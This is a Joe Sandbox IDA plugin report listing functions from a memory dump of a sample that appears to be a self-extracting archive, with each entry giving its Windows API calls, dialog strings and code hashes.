Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 20be977a0f1baead93fd68e7498d5dccf5bb3f43b3be024fa34972d4b24b2762
Instruction ID: 5693c5de8ecb71ce425a67caf53b033d9501cec511a18b20554276c8d4e1e60d
Opcode Fuzzy Hash: 20be977a0f1baead93fd68e7498d5dccf5bb3f43b3be024fa34972d4b24b2762
Instruction Fuzzy Hash: B8414871D00249AFCF15DF98CD81AAEBBB5FF48304F18805AFA14A7262D335EA51DB51

Function 00CB7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB7406

Part of subcall function 00CB3BBA: __EH_prolog.LIBCMT ref: 00CB3BBF

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00CB74CD

Part of subcall function 00CB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CB7AAB
Part of subcall function 00CB7A9C: GetLastError.KERNEL32 ref: 00CB7AF1
Part of subcall function 00CB7A9C: CloseHandle.KERNEL32(?), ref: 00CB7B00

Strings

SeRestorePrivilege, xrefs: 00CB7460
SeSecurityPrivilege, xrefs: 00CB744B

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 465d5aac645878d9250e77a76627557902ca5bc8e8db025f0d6d886619383de6
Instruction ID: b7209ba43b8b0d2a72870d63f10ff004baa0fae14598e778565b8cb387cd8d63
Opcode Fuzzy Hash: 465d5aac645878d9250e77a76627557902ca5bc8e8db025f0d6d886619383de6
Instruction Fuzzy Hash: 8A31B471D04288AADF21EBA4DC45FFE7BA9AF45304F044159FC15E7282CB749B48DB61

Function 00CCAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00CB1316: GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
Part of subcall function 00CB1316: SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370

EndDialog.USER32(?,00000001), ref: 00CCAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CCADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00CCADC2

Strings

ASKNEXTVOL, xrefs: 00CCAD28

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: bfbc5eb7c292f614ed0d6411ba630869edb8b5ae5a070e2b95b0e6dc30acd1f6
Instruction ID: aa43c75ac00a200c5f62a3ddcdabf28b78a9eb75e7a89d0a004b99b4fe21d129
Opcode Fuzzy Hash: bfbc5eb7c292f614ed0d6411ba630869edb8b5ae5a070e2b95b0e6dc30acd1f6
Instruction Fuzzy Hash: 6B110332284304BFD3118F68DC0CFEA7BA9EB0A74AF000014F342DB5A0CB619A529776

Function 00CBD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00CBD954
_strncpy.LIBCMT ref: 00CBD99A

Part of subcall function 00CC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00CF1030,?,00CBD928,00000000,?,00000050,00CF1030), ref: 00CC1DC4

Strings

@%s, xrefs: 00CBD93E
$%s, xrefs: 00CBD949

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 0b3a9f1552776c60bf3539659b5625091ed99a6d083429548d3b4032ed96aebe
Instruction ID: 1c6580d65f699c213fc7fda1f891089cd763bd9102aba53d5205cd2fc5c19e2b
Opcode Fuzzy Hash: 0b3a9f1552776c60bf3539659b5625091ed99a6d083429548d3b4032ed96aebe
Instruction Fuzzy Hash: EC21757284034CAEDB21EEA5CC05FEE7BA8AF05704F040526FA1297192F671D748DB51

Function 00CC0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CBAC5A,00000008,?,00000000,?,00CBD22D,?,00000000), ref: 00CC0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CBAC5A,00000008,?,00000000,?,00CBD22D,?,00000000), ref: 00CC0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CBAC5A,00000008,?,00000000,?,00CBD22D,?,00000000), ref: 00CC0E9F

Strings

Thread pool initialization failed., xrefs: 00CC0EB7

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 1b6650dfed6366558027838d99d60dc6b867f321c50aeab8583c87d051c24aa9
Instruction ID: d2d7dd1155e3b0b8e04a6494423f7f5c7e9cef8e7fa15f03f77ead8a225f9e87
Opcode Fuzzy Hash: 1b6650dfed6366558027838d99d60dc6b867f321c50aeab8583c87d051c24aa9
Instruction Fuzzy Hash: 2E1151B1680748DFC3215F6ADC84BABFBECEB55744F24482EF1DAC7200D671AA408B54

Function 00CCB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00CB1316: GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
Part of subcall function 00CB1316: SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370

EndDialog.USER32(?,00000001), ref: 00CCB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CCB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00CCB304

Strings

GETPASSWORD1, xrefs: 00CCB289

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: d3eb9c4cded70e81d243d4fc54bcf29d463c7b1a8492739ee4a9c54fe649bcf4
Instruction ID: 1088c479746020394c3cae99d0ba2bf53934770199f59e6b0523eed0b0d739f8
Opcode Fuzzy Hash: d3eb9c4cded70e81d243d4fc54bcf29d463c7b1a8492739ee4a9c54fe649bcf4
Instruction Fuzzy Hash: 5611C83294021576DB219EA5EC4AFFF376CEF19710F040029FA45F61D4CBA49E469771

Function 00CCDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 00CCDD31
REPLACEFILEDLG, xrefs: 00CCDD1C, 00CCDD50

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: b0c6aef50fcb8a973878973449208e021061d59c7b2308fb25b7efe417d94563
Instruction ID: 30bbb28079a0eb4630ec93ec9ba80c60bef020f4473918370f590d3d30cd2307
Opcode Fuzzy Hash: b0c6aef50fcb8a973878973449208e021061d59c7b2308fb25b7efe417d94563
Instruction Fuzzy Hash: A7015A76A04285AFDB118FA5EC44FAA7FA8E708354B04483DF907C2270CA319955DBB1

Function 00CD9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00CD9AA9
__alldvrm.LIBCMT ref: 00CD9CAA
__alldvrm.LIBCMT ref: 00CD9CCC

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction ID: 210fc2f7b313d82e1fbc681c80875794c354a6847857362b2ad1223a99500354
Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction Fuzzy Hash: B2A16B7A9143869FEB21CF58C8817AEFBE5EF91310F24416FE6959B381C2348E41C750

Function 00CBA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CB7F69,?,?,?), ref: 00CBA3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00CB7F69,?), ref: 00CBA43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CB7F69,?,?,?,?,?,?,?), ref: 00CBA4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00CB7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CBA4C6

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: b9334a9b82ba0d9267ec64c68c36577a627899fdcf7f66e70284f7eecc294cf1
Instruction ID: a4c40b945809a685738c4e36214dd4ede629a34b135c1456ad397c70441fd23b
Opcode Fuzzy Hash: b9334a9b82ba0d9267ec64c68c36577a627899fdcf7f66e70284f7eecc294cf1
Instruction Fuzzy Hash: B641C131248381AAE731DF24DC49FEEBBE49B85300F08491DF5E597191D6A4DB48DB53

Function 00CB1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00CB112B
_wcslen.LIBCMT ref: 00CB1153
_wcslen.LIBCMT ref: 00CB1182
_wcslen.LIBCMT ref: 00CB11A9

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 33bcd45105f461caa77fe874dc889bf27e62160b9ac29fd45071c9a795d9ba31
Instruction ID: 593f8c8e2aee341b68b51b82b2fcd8ece958b5af2b129137c88f8ad04604eff1
Opcode Fuzzy Hash: 33bcd45105f461caa77fe874dc889bf27e62160b9ac29fd45071c9a795d9ba31
Instruction Fuzzy Hash: 8241B6719006699BCB259F68CC1AAEF7BB8EF05310F04401EFE45F7241DF30AE458AA5

Function 00CDC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00CD47C6,00000000,00000000,00CD57FB,?,00CD57FB,?,00000001,00CD47C6,2DE85006,00000001,00CD57FB,00CD57FB), ref: 00CDC9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CDCA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00CDCA70
__freea.LIBCMT ref: 00CDCA79

Part of subcall function 00CD8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CD4286,?,0000015D,?,?,?,?,00CD5762,000000FF,00000000,?,?), ref: 00CD8E38

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 3bd44c41252da19e8e797bd01a2bfa72733eda8a197335749b970900e21b4452
Instruction ID: 46fca93902e82c21c54db4c31b96d228de06b80ab6e3c9a17999c920656bbbb2
Opcode Fuzzy Hash: 3bd44c41252da19e8e797bd01a2bfa72733eda8a197335749b970900e21b4452
Instruction Fuzzy Hash: 8231D33290021AABDF24DF64CC85EBE7BA5EB01310B044269FD18DB290E735DE51EB90

Function 00CCA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00CCA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00CCA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CCA683
ReleaseDC.USER32(00000000,00000000), ref: 00CCA691

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 7bb6acfbe7fb6e0775452a8a892adc73813997161e936ea7a1cf54d6eb88fe1c
Instruction ID: 9c764a577e11dacb2bd2cb4cc9237b1492baf6f653c72e36385af62c75dcb7b7
Opcode Fuzzy Hash: 7bb6acfbe7fb6e0775452a8a892adc73813997161e936ea7a1cf54d6eb88fe1c
Instruction Fuzzy Hash: D1E0EC31942721B7D6615F60BC1DBDA3E98AB09B52F018501FB05E6290DF7486058BB1

Function 00CCA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00CCA699: GetDC.USER32(00000000), ref: 00CCA69D
Part of subcall function 00CCA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CCA6A8
Part of subcall function 00CCA699: ReleaseDC.USER32(00000000,00000000), ref: 00CCA6B3

GetObjectW.GDI32(?,00000018,?), ref: 00CCA83C

Part of subcall function 00CCAAC9: GetDC.USER32(00000000), ref: 00CCAAD2
Part of subcall function 00CCAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00CCAB01
Part of subcall function 00CCAAC9: ReleaseDC.USER32(00000000,?), ref: 00CCAB99

Strings

(, xrefs: 00CCA9AA

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: dde2c4d824893a1ae86dded807273fff6bf52ff8e705060d9840867ee6775a3f
Instruction ID: c29b866cc823371482ba636a2dacaeb52dfab7f8912031f258b99374be384591
Opcode Fuzzy Hash: dde2c4d824893a1ae86dded807273fff6bf52ff8e705060d9840867ee6775a3f
Instruction Fuzzy Hash: C491D171604394AFD610DF25C888E6BBBE8FF89704F00491EF59AD7261DB31A946CF62

Function 00CDB1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CDB324

Part of subcall function 00CD9097: IsProcessorFeaturePresent.KERNEL32(00000017,00CD9086,00000000,00CD8D94,00000000,00000000,00000000,00000016,?,?,00CD9093,00000000,00000000,00000000,00000000,00000000), ref: 00CD9099
Part of subcall function 00CD9097: GetCurrentProcess.KERNEL32(C0000417,00CD8D94,00000000,?,00000003,00CD9868), ref: 00CD90BB
Part of subcall function 00CD9097: TerminateProcess.KERNEL32(00000000,?,00000003,00CD9868), ref: 00CD90C2

Strings

*?, xrefs: 00CDB1FB
., xrefs: 00CDB4DB

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction ID: f6ab87ca451fc319023f6e50adfbd6744089b1580e6951f689201e4dc6cf2688
Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction Fuzzy Hash: 0D519376E0010AEFDF14DFA8C881AADB7B5FF58310F25416AEA54E7350EB359E019B50

Function 00CB75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB75E3

Part of subcall function 00CC05DA: _wcslen.LIBCMT ref: 00CC05E0

Part of subcall function 00CBA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CBA598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CB777F

Part of subcall function 00CBA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CBA325,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA501
Part of subcall function 00CBA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CBA325,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA532

Strings

:, xrefs: 00CB7654

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 91ed0cd44f6507ca19027ea75d44b2efb68f8e9b489cd030c0666d3a564edb0f
Instruction ID: 4f932d75fba4ff3ae897969e8d24258bf20e159067cf435ee1ee8261862dc8c7
Opcode Fuzzy Hash: 91ed0cd44f6507ca19027ea75d44b2efb68f8e9b489cd030c0666d3a564edb0f
Instruction Fuzzy Hash: B84152B1801158AAEB35EB64CD55EEEB37CEF85300F0041D6BA09A7092DB745F89DF61

Function 00CCB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00CCB4E3
_wcslen.LIBCMT ref: 00CCB4FE

Strings

}, xrefs: 00CCB4D6

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
